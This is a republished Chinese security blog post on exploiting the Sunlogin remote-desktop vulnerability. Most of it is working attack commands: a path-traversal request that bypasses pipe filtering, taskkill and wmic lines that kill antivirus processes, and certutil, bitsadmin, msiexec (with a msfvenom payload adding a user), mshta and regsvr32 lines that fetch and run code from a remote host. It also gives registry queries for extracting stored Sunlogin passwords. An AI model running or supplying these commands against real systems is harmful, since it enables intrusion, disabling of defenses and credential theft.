暂无图片
暂无图片
暂无图片
暂无图片
暂无图片
首页 / 向日葵漏洞思考

向日葵漏洞思考

only security 2022-03-04
1288
漏洞爆发很久了,有些时候cmd和powershell不允许进行调用之类的,今天也是因为项目中出现了,尝试了一下,写一下总结吧。
0x01 背景


有两个环境是上图这样的,后面也是成功执行命令拿到权限了,但是感觉有很多方法。
0x02 可能的方法

0x001 第一种方法

添加管道符即可,绕过匹配的规则

    ping../../../../../../../../../windows/system32/cmd.exe+/c|cmd+/c+whoami


    0x002 第二种方法

    得知向日葵默认是system权限,那就可以直接去taskkill杀软了 (比较残忍,还得防止自启之类)

      ping../../../../../../../../../windows/system32/taskkill+/f+/pid+1111

      然后再去执行命令之类的,就比较方便了


      0x003 第三种方法

      可以调用其他远程下载的system32下的exe,这里简单介绍下(过杀软需自测)

      certutil

      直接用certutil去下载exe文件执行
        certutil -urlcache -split -f http://x.x.x.x/only.exe
        cmd.exe c only.exe
        注:
        缓存目录为
        %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content



        bitsadmin

          bitsadmin transfer n http://x.x.x.x/1.txt C:\Users\f0ngf0ng\\1.txt

          这里可能需要iis服务器

          IEexec

            #在攻击机器上生成msi包 msfvenom -p windows/exec CMD='net user only onlysecurity add' -f msi > evil.msi 
            #在目标机器上远程执行(直接写payload的ip和文件) msiexec q i http://x.x.x.x/evil.msi



            mshta

            mshta用于执行.hta文件,而hta是HTML Applocation的缩写,也就是HTML应用程序。
            而hta中也支持VBS。所以我们可以利用hta来下载文件。
              mshta http://x.x.x.x/run.hta



              regsvr32

              Regsvr32命令用于注册COM组件,是Windows系统提供的用来向系统注册控件或者卸载控件的命令,以命令行方式运行
                regsvr32.exe u n s /i:http://x.x.x.x/1.sct scrobj.dll



                wmic

                比如也可以调用wmic去停止杀软进程等等

                  ping../../../../../../../../../windows/system32/wbem/wmic+process+where+name%3d'360TRAY.exe'+call+terminate


                  0x004 第四种方法

                  已知是向日葵了,那么就去读取配置文件
                  安装版:
                  C:\Program Files\Oray\SunLogin\SunloginClient\config.ini
                  便携版:
                  C:\ProgramData\Oray\SunloginClient\config.ini
                  目前最新版密码已经不在配置文件中但是可以通过注册表进行查询,目前解密脚本仍可以用
                    reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo
                      reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginGreenInfo

                      reg存在于C:/windows/system32下,所以可以直接使用


                      直接连接


                      0x04 总结

                      1.在出现漏洞以后,杀软肯定会更新规则,在那之后,怎么绕过防护,利用漏洞是值得去思考的 。
                      2.有些小知识在漏洞之间可能是相通的,比如这里通过调用exe去进行深入利用。
                      3.一些可能泄露账号密码的程序,比如向日葵、finalshell之类的配置文件可以收集起来,在这里漏洞点如果只能读取文件的时候,也可以进行深入利用。


                      参考链接:

                      https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-download-a-file/

                      https://www.cnblogs.com/xiaozi/p/12721960.html

                      https://github.com/wafinfo/Sunflower_get_Password


                      向日葵漏洞
                      文章转载自only security,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

                      评论